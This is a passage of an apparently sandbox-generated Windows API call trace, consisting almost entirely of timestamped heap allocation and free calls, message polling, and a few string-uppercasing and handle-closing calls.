wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0260.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0260.975] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0260.975] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0260.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0260.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0260.976] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0260.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0260.976] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0260.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.976] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0260.977] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0260.977] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0260.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.978] FreeLibrary (hLibModule=0x74d40000) returned 1 [0260.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.978] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0260.978] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0260.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0260.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.978] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0260.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0260.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0260.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0260.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0260.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0260.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0260.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0260.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0260.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0260.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0260.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0260.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.980] CloseHandle (hObject=0x1f8) returned 1 [0260.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0260.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.983] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0260.984] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0260.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0260.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0260.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0260.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0260.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0260.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0260.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.984] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.984] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0260.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0260.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0260.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0260.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0260.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7e8 [0260.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0260.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.985] CloseHandle (hObject=0x2c8) returned 1 [0260.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0260.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0260.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0260.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0260.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0260.989] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0260.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0260.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0260.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0260.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0260.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0260.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0260.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0260.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0260.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0260.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0260.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0260.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0260.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0260.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0260.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0260.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0260.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0260.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0260.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0260.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0260.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0260.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0260.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0260.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0260.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0260.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0260.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0260.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0260.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0260.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0260.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0260.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0260.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0260.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0260.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: 